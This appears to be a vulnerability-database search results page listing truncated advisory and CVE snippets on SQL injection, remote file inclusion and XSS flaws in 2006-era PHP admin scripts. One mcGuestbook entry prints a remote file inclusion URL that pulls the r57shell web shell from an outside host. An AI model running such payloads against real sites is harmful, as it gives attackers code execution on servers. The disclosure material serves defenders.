1599 matches found
CVE-2006-4328
SQL injection vulnerability in admin.php in CloudNine Interactive Links Manager 2006-06-12, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the nick parameter...
[Full-disclosure] SmartSiteCMS v1.0 authentication bypass
SmartSiteCMS v1.0 authentication bypass STATUS: I contacted the vendor more than 2 months ago and still no response. TECHNICAL INFO ================================================================ One of the worst cms I've ever seen regarding security, no input sanitation at all. Bypassing...
CVE-2006-3963
Multiple SQL injection vulnerabilities in Banex PHP MySQL Banner Exchange 2.21 allow remote attackers to execute arbitrary SQL commands via the 1 sitename parameter to a signup.php, and the 2 id, 3 deleteuserbanner, 4 viewmem, 5 viewmemunb, 6 viewunmem,or 7 deleteuser parameters to b admin.php...
mospray.txt
Kurdish Security MoSpray Remote File Include Vulnerability Original Advisory : http://kurdishsecurity.blogspot.com/2006/07/kurdish-security-14-mospray-basedir.html Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : MoSpray Site :...
SQL-Injection in Shop-Script PRO & Shop-Script Premium all version
Advisory: SQL-Injection in Shop-Script PRO & Shop-Script Premium all version. Home Page: http://shop-script.ru Уязвимость/Vulnerability: SQL-injection в зоне администрирования. Уязвимый скрипт/Vulnerable script: admin.php...
CVE-2006-3323
PHP remote file inclusion vulnerability in admin/admin.php in MF Piadas 1.0 allows remote attackers to execute arbitrary PHP code via the page parameter. NOTE: the same vector can be used for cross-site scripting, but CVE analysis suggests that this is resultant from file inclusion of HTML or...
CVE-2006-3323
PHP remote file inclusion vulnerability in admin/admin.php in MF Piadas 1.0 allows remote attackers to execute arbitrary PHP code via the page parameter. NOTE: the same vector can be used for cross-site scripting, but CVE analysis suggests that this is resultant from file inclusion of HTML or...
CVE-2006-3323
MF Piadas 1.0 is affected by a PHP remote file inclusion in admin/admin.php, exploitable via the page parameter to execute arbitrary code. The underlying issue is a file inclusion vulnerability (HTML/script vector noted as related by CVE analysis). Connected advisories also reference cross-site s...
file include exploits in mcGuestbook 1.3
Multiple file include exploits in mcGuestbook 1.3 script type : mcGuestbook 1.3 bug found by : sweet-devil team : site-down type : file include exploits : admin.php http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt? ecrire.php...
file include exploits in mcGuestbook 1.3
Multiple file include exploits in mcGuestbook 1.3 script type : mcGuestbook 1.3 bug found by : sweet-devil team : site-down type : file include exploits : admin.php http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt? ecrire.php...
Cross site scripting
Cross-site scripting XSS vulnerability in admin.php in Particle Links 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the username parameter...
CVE-2006-2903
CVE-2006-2903 describes a cross-site scripting (XSS) vulnerability in Particle Links 1.2.2, specifically in admin.php where the username parameter can be exploited to inject arbitrary script/HTML. The available references (e.g., NVD entry) list a low severity (CVSS v2 base 2.6) with network attac...
CVE-2006-2903
Cross-site scripting XSS vulnerability in admin.php in Particle Links 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the username parameter...
BloggIT <= 1.01 (admin.php) Arbitrary code execution
/ Federico Fazzi, [email protected] / BloggIT = 1.01 admin.php Arbitrary code execution / 04/06/2006 5:48 Bug: The BloggIT have on the admin.php: require"session.inc.php"; //- sessionstart; //- if $SESSION'login' != "ok" header"Location: index.php"; and require function don't include the fil...
CVE-2005-2466
OpenBook 1.2.2 is affected by multiple SQL injection vulnerabilities in the auth_user function of admin.php, allowing remote attackers to execute arbitrary SQL commands via the (1) username or (2) password parameter. The vulnerability is detailed in CVE-2005-2466 with a NVD base score of 6.4 (MED...
PT-2006-3777 · Mybloggie · Mybloggie
Name of the Vulnerable Software and Affected Versions: MyBloggie versions 2.1.1 and earlier Description: A remote file inclusion issue allows remote attackers to execute arbitrary PHP code via a URL in the mybloggie root path parameter to admin.php. The issue's validity has been disputed, with so...
Remote file inclusion
PHP remote file inclusion vulnerability in Fastpublish CMS 1.6.9.d allows remote attackers to include arbitrary files via the configfsBase parameter in 1 drucken.php, 2 drucken2.php, 3 emailanbenutzer.php, 4 rechnung.php, 5 suche/search.php and 6 adminbereich/admin.php...
CVE-2006-2726
PHP remote file inclusion vulnerability in Fastpublish CMS 1.6.9.d allows remote attackers to include arbitrary files via the configfsBase parameter in 1 drucken.php, 2 drucken2.php, 3 emailanbenutzer.php, 4 rechnung.php, 5 suche/search.php and 6 adminbereich/admin.php...
CVE-2006-2635
Multiple cross-site scripting XSS vulnerabilities in Tikiwiki aka Tiki CMS/Groupware 1.9.x allow remote attackers to inject arbitrary web script or HTML via malformed nested HTML tags such as "ipt" in 1 offset and 2 days parameters in a tiki-lastchanges.php, the 3 find and 4 offset parameters in ...
CVE-2006-2566
Alstrasoft Article Manager Pro 1.6 allows remote attackers to obtain sensitive information via 1 a quote character or possibly an invalid value in the action parameter in a request to mrarticles.php or 2 a login QUERYSTRING to admin.php without any additional parameters, which reveal the path in...